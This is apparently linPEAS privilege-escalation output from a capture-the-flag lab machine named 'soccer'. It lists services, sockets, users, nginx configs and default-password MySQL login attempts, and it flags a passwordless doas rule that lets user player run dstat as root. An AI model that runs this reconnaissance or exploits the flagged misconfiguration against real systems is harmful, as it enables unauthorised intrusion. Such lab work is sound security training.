-rwxr-xr-x   1 root root 1123 Feb 25  2020 man-db
-rwxr-xr-x   1 root root 4574 Jul 18  2019 popularity-contest
-rwxr-xr-x   1 root root  214 Apr 25  2022 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x   2 root root 4096 Nov 15 21:39 .
drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x   2 root root 4096 Nov 15 21:39 .
drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x   2 root root 4096 Nov 15 21:40 .
drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root  813 Feb 25  2020 man-db
-rwxr-xr-x   1 root root  403 Apr 25  2022 update-notifier-common

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths                                                                                  
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin                                                                                                     

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services                                                                                                     
/etc/systemd/system/multi-user.target.wants/atd.service is executing some relative path                                                                                         
/etc/systemd/system/multi-user.target.wants/grub-common.service is executing some relative path
/etc/systemd/system/sleep.target.wants/grub-common.service is executing some relative path
You can't write on systemd PATH

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers                                                                                                       
NEXT                        LEFT          LAST                        PASSED       UNIT                         ACTIVATES                                                       
Sun 2023-03-19 07:09:00 UTC 29s left      Sun 2023-03-19 06:39:00 UTC 29min ago    phpsessionclean.timer        phpsessionclean.service       
Sun 2023-03-19 11:19:55 UTC 4h 11min left Sat 2023-03-18 11:19:55 UTC 19h ago      systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2023-03-19 13:38:42 UTC 6h left       Sun 2023-03-19 06:52:17 UTC 16min ago    ua-timer.timer               ua-timer.service              
Sun 2023-03-19 14:28:28 UTC 7h left       Sun 2023-03-19 04:18:49 UTC 2h 49min ago motd-news.timer              motd-news.service             
Sun 2023-03-19 17:28:47 UTC 10h left      Sat 2023-03-18 18:13:21 UTC 12h ago      apt-daily.timer              apt-daily.service             
Mon 2023-03-20 00:00:00 UTC 16h left      Sat 2023-03-18 11:05:04 UTC 20h ago      fstrim.timer                 fstrim.service                
Mon 2023-03-20 00:00:00 UTC 16h left      Sun 2023-03-19 00:00:06 UTC 7h ago       logrotate.timer              logrotate.service             
Mon 2023-03-20 00:00:00 UTC 16h left      Sun 2023-03-19 00:00:06 UTC 7h ago       man-db.timer                 man-db.service                
Mon 2023-03-20 00:17:52 UTC 17h left      Sun 2023-03-19 06:46:57 UTC 21min ago    fwupd-refresh.timer          fwupd-refresh.service         
Mon 2023-03-20 06:29:22 UTC 23h left      Sun 2023-03-19 06:12:10 UTC 56min ago    apt-daily-upgrade.timer      apt-daily-upgrade.service     
Sun 2023-03-26 03:10:59 UTC 6 days left   Sun 2023-03-19 03:10:07 UTC 3h 58min ago e2scrub_all.timer            e2scrub_all.service           
n/a                         n/a           n/a                         n/a          snapd.snap-repair.timer      snapd.snap-repair.service     

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers                                                                                                       
                                                                                                                                                                                
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets                                                                                                      
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request                                                                     
/snap/core20/1695/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core20/1695/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core20/1695/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core20/1695/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core20/1695/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core20/1695/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/snap/core20/1695/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core20/1695/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core20/1695/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets                                                                                                      
/org/kernel/linux/storage/multipathd                                                                                                                                            
/root/.pm2/pub.sock
/root/.pm2/rpc.sock
/run/dbus/system_bus_socket
  └─(Read Write)
/run/irqbalance//irqbalance747.sock
  └─(Read )
/run/irqbalance/irqbalance747.sock
  └─(Read )
/run/lvm/lvmpolld.socket
/run/mysqld/mysqld.sock
  └─(Read Write)
/run/mysqld/mysqlx.sock
  └─(Read Write)
/run/php/php7.4-fpm.sock
/run/snapd-snap.socket
  └─(Read Write)
/run/snapd.socket
  └─(Read Write)
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
  └─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/journal/syslog
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
  └─(Read Write)
/run/udev/control
/run/user/1001/bus
  └─(Read Write)
/run/user/1001/gnupg/S.dirmngr
  └─(Read Write)
/run/user/1001/gnupg/S.gpg-agent
  └─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.browser
  └─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.extra
  └─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.ssh
  └─(Read Write)
/run/user/1001/pk-debconf-socket
  └─(Read Write)
/run/user/1001/snapd-session-agent.socket
  └─(Read Write)
/run/user/1001/systemd/notify
  └─(Read Write)
/run/user/1001/systemd/private
  └─(Read Write)
/run/uuidd/request
  └─(Read Write)
/run/vmware/guestServicePipe
  └─(Read Write)
/var/run/mysqld/mysqld.sock
  └─(Read Write)
/var/run/mysqld/mysqlx.sock
  └─(Read Write)
/var/run/vmware/guestServicePipe
  └─(Read Write)
/var/snap/lxd/common/lxd/unix.socket

╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus                                                                                                        
                                                                                                                                                                                
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus                                                                                                        
NAME                          PID PROCESS USER CONNECTION    UNIT SESSION DESCRIPTION                                                                                           
:1.0                            - -       -    -             -    -       -
:1.1                            - -       -    -             -    -       -
:1.11                           - -       -    -             -    -       -
:1.148                          - -       -    -             -    -       -
:1.156                          - -       -    -             -    -       -
:1.27                           - -       -    -             -    -       -
:1.3                            - -       -    -             -    -       -
:1.4                            - -       -    -             -    -       -
:1.5                            - -       -    -             -    -       -
:1.6                            - -       -    -             -    -       -
:1.7                            - -       -    -             -    -       -
:1.8                            - -       -    -             -    -       -
:1.9                            - -       -    -             -    -       -
com.ubuntu.LanguageSelector     - -       -    (activatable) -    -       -
com.ubuntu.SoftwareProperties   - -       -    (activatable) -    -       -
org.freedesktop.Accounts        - -       -    -             -    -       -
org.freedesktop.DBus            - -       -    -             -    -       -
org.freedesktop.ModemManager1   - -       -    -             -    -       -
org.freedesktop.PackageKit      - -       -    (activatable) -    -       -
org.freedesktop.PolicyKit1      - -       -    -             -    -       -
org.freedesktop.UDisks2         - -       -    -             -    -       -
org.freedesktop.bolt            - -       -    (activatable) -    -       -
org.freedesktop.fwupd           - -       -    -             -    -       -
org.freedesktop.hostname1       - -       -    (activatable) -    -       -
org.freedesktop.locale1         - -       -    (activatable) -    -       -
org.freedesktop.login1          - -       -    -             -    -       -
org.freedesktop.network1        - -       -    -             -    -       -
org.freedesktop.resolve1        - -       -    -             -    -       -
org.freedesktop.systemd1        - -       -    -             -    -       -
org.freedesktop.timedate1       - -       -    (activatable) -    -       -
org.freedesktop.timesync1       - -       -    (activatable) -    -       -


                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════                                                                                             
                              ╚═════════════════════╝                                                                                                                           
╔══════════╣ Hostname, hosts and DNS
soccer                                                                                                                                                                          
127.0.0.1       localhost       soccer  soccer.htb      soc-player.soccer.htb

127.0.1.1       ubuntu-focal    ubuntu-focal


nameserver 127.0.0.53
options edns0 trust-ad

╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information                                                                                                             
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.194  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:b17b  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:b17b  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:b1:7b  txqueuelen 1000  (Ethernet)
        RX packets 229490  bytes 33975517 (33.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 241272  bytes 72136368 (72.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 102027  bytes 23742553 (23.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 102027  bytes 23742553 (23.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                                   
tcp        0      0 0.0.0.0:9091            0.0.0.0:*               LISTEN      -                                                                                               
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   

╔══════════╣ Can I sniff with tcpdump?
No                                                                                                                                                                              
                                                                                                                                                                                


                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════                                                                                             
                               ╚═══════════════════╝                                                                                                                            
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users                                                                                                        
uid=1001(player) gid=1001(player) groups=1001(player)                                                                                                                           

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg                                                                                                                                                                    
netpgpkeys Not Found
netpgp Not Found                                                                                                                                                                
                                                                                                                                                                                
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                
Sorry, try again.                                                                                                                                                               

╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens                                                                                          
ptrace protection is enabled (1)                                                                                                                                                
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it

╔══════════╣ Checking doas.conf
permit nopass player as root cmd /usr/bin/dstat                                                                                                                                 

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2                                                                      
                                                                                                                                                                                
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                                                                                                                 

╔══════════╣ Users with console
player:x:1001:1001::/home/player:/bin/bash                                                                                                                                      
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                                                                                                          
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1001(player) gid=1001(player) groups=1001(player)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=110(landscape) gid=115(landscape) groups=115(landscape)
uid=111(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)
uid=112(fwupd-refresh) gid=116(fwupd-refresh) groups=116(fwupd-refresh)
uid=113(mysql) gid=121(mysql) groups=121(mysql)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=997(_laurel) gid=997(_laurel) groups=997(_laurel)
uid=998(lxd) gid=100(users) groups=100(users)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)

╔══════════╣ Login now
 07:08:33 up 20:03,  2 users,  load average: 0.14, 0.04, 0.01                                                                                                                   
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

╔══════════╣ Last logons
root     tty1         Fri Dec  2 10:53:47 2022 - down                      (00:01)     0.0.0.0                                                                                  
reboot   system boot  Fri Dec  2 10:53:14 2022 - Fri Dec  2 10:54:54 2022  (00:01)     0.0.0.0
root     tty1         Fri Dec  2 10:50:00 2022 - down                      (00:03)     0.0.0.0
reboot   system boot  Fri Dec  2 10:48:18 2022 - Fri Dec  2 10:53:08 2022  (00:04)     0.0.0.0
player   pts/0        Fri Dec  2 09:16:09 2022 - Fri Dec  2 09:18:16 2022  (00:02)     10.10.14.40
reboot   system boot  Fri Dec  2 09:14:12 2022 - Fri Dec  2 09:18:19 2022  (00:04)     0.0.0.0
player   pts/0        Thu Dec  1 19:01:52 2022 - Thu Dec  1 19:09:17 2022  (00:07)     10.10.14.40
reboot   system boot  Thu Dec  1 19:01:06 2022 - Thu Dec  1 19:09:20 2022  (00:08)     0.0.0.0

wtmp begins Thu Dec  1 19:01:06 2022

╔══════════╣ Last time logon each user
Username         Port     From             Latest                                                                                                                               
root             tty1                      Fri Dec  2 10:53:47 +0000 2022
player           pts/2    10.10.16.6       Sun Mar 19 07:03:42 +0000 2023

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
                                                                                                                                                                                
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
                                                                                                                                                                                


                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════                                                                                              
                             ╚══════════════════════╝                                                                                                                           
╔══════════╣ Useful software
/usr/bin/base64                                                                                                                                                                 
/usr/bin/curl
/usr/local/bin/doas
/usr/bin/g++
/usr/bin/gcc
/snap/bin/lxc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
ii  g++                             4:9.3.0-1ubuntu2                  amd64        GNU C++ compiler                                                                             
ii  g++-9                           9.4.0-1ubuntu1~20.04.1            amd64        GNU C++ compiler
ii  gcc                             4:9.3.0-1ubuntu2                  amd64        GNU C compiler
ii  gcc-9                           9.4.0-1ubuntu1~20.04.1            amd64        GNU C compiler
/usr/bin/gcc

╔══════════╣ MySQL version
mysql  Ver 8.0.31-0ubuntu0.20.04.2 for Linux on x86_64 ((Ubuntu))                                                                                                               


═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No                                                                                                                      
═╣ MySQL connection using root/NOPASS ................. No                                                                                                                      
                                                                                                                                                                                
╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user              = mysql                                                                                                 
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/

╔══════════╣ Analyzing MariaDB Files (limit 70)
                                                                                                                                                                                
-rw------- 1 root root 317 Dec  1 18:13 /etc/mysql/debian.cnf

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.41 (Ubuntu)                                                                                                                          
Server built:   2022-06-14T13:30:55
httpd Not Found
                                                                                                                                                                                
Nginx version: 
/etc/apache2/mods-available/php7.4.conf-
/etc/apache2/mods-available/php7.4.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.4.conf-
/etc/apache2/mods-available/php7.4.conf:    SetHandler application/x-httpd-php-source
══╣ Nginx modules
ngx_http_image_filter_module.so                                                                                                                                                 
ngx_http_xslt_filter_module.so
ngx_mail_module.so
ngx_stream_module.so
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Dec  1 13:48 /etc/nginx/sites-enabled                                                                                                               
drwxr-xr-x 2 root root 4096 Dec  1 13:48 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 41 Nov 17 08:39 /etc/nginx/sites-enabled/soc-player.htb -> /etc/nginx/sites-available/soc-player.htb
server {
        listen 80;
        listen [::]:80;
        server_name soc-player.soccer.htb;
        root /root/app/views;
        location / {
                proxy_pass http://localhost:3000;
                proxy_http_version 1.1;
                proxy_set_header Upgrade $http_upgrade;
                proxy_set_header Connection 'upgrade';
                proxy_set_header Host $host;
                proxy_cache_bypass $http_upgrade;
        }
}
lrwxrwxrwx 1 root root 34 Nov 17 08:06 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default
server {
        listen 80;
        listen [::]:80;
        server_name 0.0.0.0;
        return 301 http://soccer.htb$request_uri;
}
server {
        listen 80;
        listen [::]:80;
        server_name soccer.htb;
        root /var/www/html;
        index index.html tinyfilemanager.php;

        location / {
               try_files $uri $uri/ =404;
        }
        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.4-fpm.sock;
        }
        location ~ /\.ht {
                deny all;
        }
}



-rw-r--r-- 1 root root 72941 Nov  2 09:53 /etc/php/7.4/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 72539 Nov  2 09:53 /etc/php/7.4/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 72941 Nov  2 09:53 /etc/php/7.4/fpm/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On

-rw-r--r-- 1 root root 1490 Feb  4  2019 /etc/nginx/nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
        worker_connections 768;
}
http {
        sendfile on;
        tcp_nopush on;
        tcp_nodelay on;
        keepalive_timeout 65;
        types_hash_max_size 2048;
        include /etc/nginx/mime.types;
        default_type application/octet-stream;
        ssl_prefer_server_ciphers on;
        access_log /var/log/nginx/access.log;
        error_log /var/log/nginx/error.log;
        gzip on;
        include /etc/nginx/conf.d/*.conf;
        include /etc/nginx/sites-enabled/*;
}

-rw-r--r-- 1 root root 389 Feb  4  2019 /etc/default/nginx

-rwxr-xr-x 1 root root 4579 Feb  4  2019 /etc/init.d/nginx

-rw-r--r-- 1 root root 329 Feb  4  2019 /etc/logrotate.d/nginx

drwxr-xr-x 8 root root 4096 Nov 17 08:06 /etc/nginx
lrwxrwxrwx 1 root root 48 Nov 17 08:06 /etc/nginx/modules-enabled/50-mod-mail.conf -> /usr/share/nginx/modules-available/mod-mail.conf
load_module modules/ngx_mail_module.so;
lrwxrwxrwx 1 root root 61 Nov 17 08:06 /etc/nginx/modules-enabled/50-mod-http-image-filter.conf -> /usr/share/nginx/modules-available/mod-http-image-filter.conf
load_module modules/ngx_http_image_filter_module.so;
lrwxrwxrwx 1 root root 50 Nov 17 08:06 /etc/nginx/modules-enabled/50-mod-stream.conf -> /usr/share/nginx/modules-available/mod-stream.conf
load_module modules/ngx_stream_module.so;
lrwxrwxrwx 1 root root 60 Nov 17 08:06 /etc/nginx/modules-enabled/50-mod-http-xslt-filter.conf -> /usr/share/nginx/modules-available/mod-http-xslt-filter.conf
load_module modules/ngx_http_xslt_filter_module.so;
-rw-r--r-- 1 root root 423 Feb  4  2019 /etc/nginx/snippets/fastcgi-php.conf
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
try_files $fastcgi_script_name =404;
set $path_info $fastcgi_path_info;
fastcgi_param PATH_INFO $path_info;
fastcgi_index index.php;
include fastcgi.conf;
-rw-r--r-- 1 root root 217 Feb  4  2019 /etc/nginx/snippets/snakeoil.conf
ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;
ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;
-rw-r--r-- 1 root root 1490 Feb  4  2019 /etc/nginx/nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
        worker_connections 768;
}
http {
        sendfile on;
        tcp_nopush on;
        tcp_nodelay on;
        keepalive_timeout 65;
        types_hash_max_size 2048;
        include /etc/nginx/mime.types;
        default_type application/octet-stream;
        ssl_prefer_server_ciphers on;
        access_log /var/log/nginx/access.log;
        error_log /var/log/nginx/error.log;
        gzip on;
        include /etc/nginx/conf.d/*.conf;
        include /etc/nginx/sites-enabled/*;
}
-rw-r--r-- 1 root root 1077 Feb  4  2019 /etc/nginx/fastcgi.conf
fastcgi_param  SCRIPT_FILENAME    $document_root$fastcgi_script_name;
fastcgi_param  QUERY_STRING       $query_string;
fastcgi_param  REQUEST_METHOD     $request_method;
fastcgi_param  CONTENT_TYPE       $content_type;
fastcgi_param  CONTENT_LENGTH     $content_length;
fastcgi_param  SCRIPT_NAME        $fastcgi_script_name;
fastcgi_param  REQUEST_URI        $request_uri;
fastcgi_param  DOCUMENT_URI       $document_uri;
fastcgi_param  DOCUMENT_ROOT      $document_root;
fastcgi_param  SERVER_PROTOCOL    $server_protocol;
fastcgi_param  REQUEST_SCHEME     $scheme;
fastcgi_param  HTTPS              $https if_not_empty;
fastcgi_param  GATEWAY_INTERFACE  CGI/1.1;
fastcgi_param  SERVER_SOFTWARE    nginx/$nginx_version;
fastcgi_param  REMOTE_ADDR        $remote_addr;
fastcgi_param  REMOTE_PORT        $remote_port;
fastcgi_param  SERVER_ADDR        $server_addr;
fastcgi_param  SERVER_PORT        $server_port;
fastcgi_param  SERVER_NAME        $server_name;
fastcgi_param  REDIRECT_STATUS    200;

-rw-r--r-- 1 root root 374 Feb  4  2019 /etc/ufw/applications.d/nginx

drwxr-xr-x 3 root root 4096 Nov 17 08:06 /usr/lib/nginx

-rwxr-xr-x 1 root root 1195152 Nov 10 06:38 /usr/sbin/nginx

drwxr-xr-x 2 root root 4096 Nov 17 08:06 /usr/share/doc/nginx

drwxr-xr-x 4 root root 4096 Nov 17 08:06 /usr/share/nginx
-rw-r--r-- 1 root root 53 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-image-filter.conf
load_module modules/ngx_http_image_filter_module.so;
-rw-r--r-- 1 root root 52 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-xslt-filter.conf
load_module modules/ngx_http_xslt_filter_module.so;
-rw-r--r-- 1 root root 42 Nov 10 06:38 /usr/share/nginx/modules-available/mod-stream.conf
load_module modules/ngx_stream_module.so;
-rw-r--r-- 1 root root 40 Nov 10 06:38 /usr/share/nginx/modules-available/mod-mail.conf
load_module modules/ngx_mail_module.so;

drwxr-xr-x 7 root root 4096 Nov 17 08:06 /var/lib/nginx
find: ‘/var/lib/nginx/proxy’: Permission denied
find: ‘/var/lib/nginx/scgi’: Permission denied
find: ‘/var/lib/nginx/fastcgi’: Permission denied
find: ‘/var/lib/nginx/uwsgi’: Permission denied
find: ‘/var/lib/nginx/body’: Permission denied

drwxr-xr-x 2 root adm 4096 Mar 19 00:00 /var/log/nginx


╔══════════╣ Analyzing FastCGI Files (limit 70)
-rw-r--r-- 1 root root 1007 Feb  4  2019 /etc/nginx/fastcgi_params                                                                                                              

╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Aug 16  2022 /usr/share/doc/rsync/examples/rsyncd.conf                                                                                              
[ftp]
        comment = public archive
        path = /var/www/pub
        use chroot = yes
        lock file = /var/lock/rsyncd
        read only = yes
        list = yes
        uid = nobody
        gid = nogroup
        strict modes = yes
        ignore errors = no
        ignore nonreadable = yes
        transfer logging = no
        timeout = 600
        refuse options = checksum dry-run
        dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'                                                                                                                            
drwxr-xr-x 2 root root 4096 Nov 15 21:40 /etc/ldap


╔══════════╣ Searching ssl/ssh files
PasswordAuthentication yes                                                                                                                                                      
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some certificates were found (out limited):
/etc/pki/fwupd-metadata/LVFS-CA.pem                                                                                                                                             
/etc/pki/fwupd/LVFS-CA.pem
/etc/pollinate/entropy.ubuntu.com.pem
/snap/core20/1695/etc/ssl/certs/ACCVRAIZ1.pem
/snap/core20/1695/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/snap/core20/1695/etc/ssl/certs/AC_RAIZ_FNMT-RCM_SERVIDORES_SEGUROS.pem
/snap/core20/1695/etc/ssl/certs/ANF_Secure_Server_Root_CA.pem
/snap/core20/1695/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/snap/core20/1695/etc/ssl/certs/AffirmTrust_Commercial.pem
/snap/core20/1695/etc/ssl/certs/AffirmTrust_Networking.pem
/snap/core20/1695/etc/ssl/certs/AffirmTrust_Premium.pem
/snap/core20/1695/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/snap/core20/1695/etc/ssl/certs/Amazon_Root_CA_1.pem
/snap/core20/1695/etc/ssl/certs/Amazon_Root_CA_2.pem
/snap/core20/1695/etc/ssl/certs/Amazon_Root_CA_3.pem
/snap/core20/1695/etc/ssl/certs/Amazon_Root_CA_4.pem
/snap/core20/1695/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/snap/core20/1695/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/snap/core20/1695/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/snap/core20/1695/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
308505PSTORAGE_CERTSBIN

══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket                                                                                                                 
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config                                                                                                                                                  
